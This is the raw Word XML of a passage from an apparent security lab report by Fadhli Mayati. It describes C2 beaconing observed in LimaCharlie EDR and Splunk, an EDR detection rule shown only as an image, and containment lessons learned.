    <w:p w14:paraId="55CEC1E3" w14:textId="21378639" w:rsidR="00AD74D1" w:rsidRPr="00AD74D1" w:rsidRDefault="005F59D9" w:rsidP="00AD74D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidR="00AD74D1" w:rsidRPr="00AD74D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Network Beaconing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Correltation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD74D1" w:rsidRPr="00AD74D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (C2 Establishment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F1039E" w14:textId="77777777" w:rsidR="00AD74D1" w:rsidRPr="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:r w:rsidRPr="00AD74D1">
        <w:t>Observation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E06C77" w14:textId="77777777" w:rsidR="00282901" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:r w:rsidRPr="00AD74D1">
        <w:t xml:space="preserve">Immediately following execution, the process initiated an outbound TCP connection to </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD74D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>192.168.1.</w:t>
      </w:r>
      <w:r w:rsidR="005F59D9" w:rsidRPr="00282901">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>101</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD74D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> over port 80 (HTTP).</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD74D1">
        <w:t xml:space="preserve"> The traffic showed a consistent pattern (Beaconing) characteristic of C2 malware calling home for instructions.</w:t>
      </w:r>
      <w:r w:rsidR="00282901">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00282901">
        <w:t>This activities</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00282901">
        <w:t xml:space="preserve"> were observed from our:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7424C2A6" w14:textId="7C9CDD3D" w:rsidR="00AD74D1" w:rsidRDefault="00282901" w:rsidP="00AD74D1">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LimaCharlie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> EDR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608E183D" w14:textId="3500F2FD" w:rsidR="008F24F2" w:rsidRPr="00AD74D1" w:rsidRDefault="008F24F2" w:rsidP="00AD74D1">
      <w:r w:rsidRPr="008F24F2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0076B1A6" wp14:editId="682EB029">
            <wp:extent cx="5731510" cy="2327910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="33063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36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5D0E" w14:textId="77777777" w:rsidR="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:r w:rsidRPr="00AD74D1">
        <w:t>Splunk Log Evidence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A13D31" w14:textId="47069398" w:rsidR="00783F35" w:rsidRDefault="00783F35" w:rsidP="00AD74D1">
      <w:r w:rsidRPr="00783F35">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D729351" wp14:editId="529B1F86">
            <wp:extent cx="5731510" cy="3265805"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="131759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97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F600" w14:textId="77777777" w:rsidR="00783F35" w:rsidRDefault="00783F35">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5B277B" w14:textId="08DFA26B" w:rsidR="00783F35" w:rsidRDefault="00783F35" w:rsidP="00AD74D1">
      <w:r w:rsidRPr="00783F35">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06668B90" wp14:editId="30B6DEDF">
            <wp:extent cx="5731510" cy="3156585"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="101858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82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8719" w14:textId="77777777" w:rsidR="00AD74D1" w:rsidRPr="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:r w:rsidRPr="00AD74D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Detection Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2805923C" w14:textId="5CE0FD13" w:rsidR="00AD74D1" w:rsidRPr="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:r w:rsidRPr="00AD74D1">
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="00282901">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD74D1">
        <w:t>. EDR Rule (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD74D1">
        <w:t>LimaCharlie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD74D1">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C7C41C" w14:textId="77777777" w:rsidR="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:r w:rsidRPr="00AD74D1">
        <w:t>The following D&amp;R (Detection &amp; Response) rule triggers on unsigned binaries connecting to the internet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5DF7FC" w14:textId="4F798910" w:rsidR="00B01A4E" w:rsidRPr="00AD74D1" w:rsidRDefault="00B01A4E" w:rsidP="00AD74D1">
      <w:r w:rsidRPr="00B01A4E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="048C08ED" wp14:editId="15ADCD48">
            <wp:extent cx="5731510" cy="1505585"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="191157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71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9346" w14:textId="77777777" w:rsidR="00AD74D1" w:rsidRPr="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:r w:rsidRPr="00AD74D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Containment &amp; Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3457B1E8" w14:textId="77777777" w:rsidR="00AD74D1" w:rsidRPr="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD74D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Containment Status:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD74D1">
        <w:t xml:space="preserve"> DELAYED.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2350E414" w14:textId="77777777" w:rsidR="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD74D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reasoning:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD74D1">
        <w:t xml:space="preserve"> The host was deliberately left active to observe Phase 2 (Privilege Escalation) and Phase 3 (Persistence) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD74D1">
        <w:t>behaviors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD74D1">
        <w:t>. In a production environment, the host would be isolated immediately upon confirming the C2 beacon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A1DF11" w14:textId="53F7442F" w:rsidR="005F59D9" w:rsidRDefault="005F59D9" w:rsidP="00AD74D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real World Scenario:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The host will be immediately isolated through the feature offered by the EDR to avoid any lateral movement over the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DE844D" w14:textId="4EEE36A6" w:rsidR="005F59D9" w:rsidRPr="00AD74D1" w:rsidRDefault="005F59D9" w:rsidP="005F59D9">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="005F59D9">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23B34B2F" wp14:editId="002A8473">
            <wp:extent cx="5731510" cy="3222625"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="92364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477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6188" w14:textId="1788D494" w:rsidR="00AD74D1" w:rsidRPr="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1"/>
    <w:sectPr w:rsidR="00AD74D1" w:rsidRPr="00AD7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3B0F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CDC6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3749A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F54E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136C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="153E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73109"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C950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663CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="926C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85C71"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="56A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65452"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4C36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26103"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E598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73FFF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D422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ED2AF8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="44DA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91D94"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA4E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C0358"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="023E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E8602B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1D2E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81E66"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D644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90020"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DB7A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901A0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="04E8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929B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="10EE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75924">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1495417439">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1673993788">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="318462618">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="896860835">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="33777041">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="701906440">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1873569109">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="2101217215">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1809590976">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="14353210">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1419710618">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1502702362">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1153527338">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1129670186">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="574051061">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="16285822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4D1"/>
    <w:rsid w:val="001458A1"/>
    <w:rsid w:val="001C2BD4"/>
    <w:rsid w:val="00282901"/>
    <w:rsid w:val="005F59D9"/>
    <w:rsid w:val="00783F35"/>
    <w:rsid w:val="008A7F8E"/>
    <w:rsid w:val="008F24F2"/>
    <w:rsid w:val="009E39C1"/>
    <w:rsid w:val="00AD74D1"/>
    <w:rsid w:val="00B01A4E"/>
    <w:rsid w:val="00BE0A10"/>
    <w:rsid w:val="00DF572B"/>
    <w:rsid w:val="00EA1013"/>
    <w:rsid w:val="00EB59B2"/>
    <w:rsid w:val="00FE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15CB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{96888491-7E48-4FA1-8DC6-5BE07F3B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901"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00AD7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4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59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E172B-CFC4-48D1-BB00-91A159153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Fadhli Mayati</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Fadhli Mayati</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-09T16:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-09T16:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>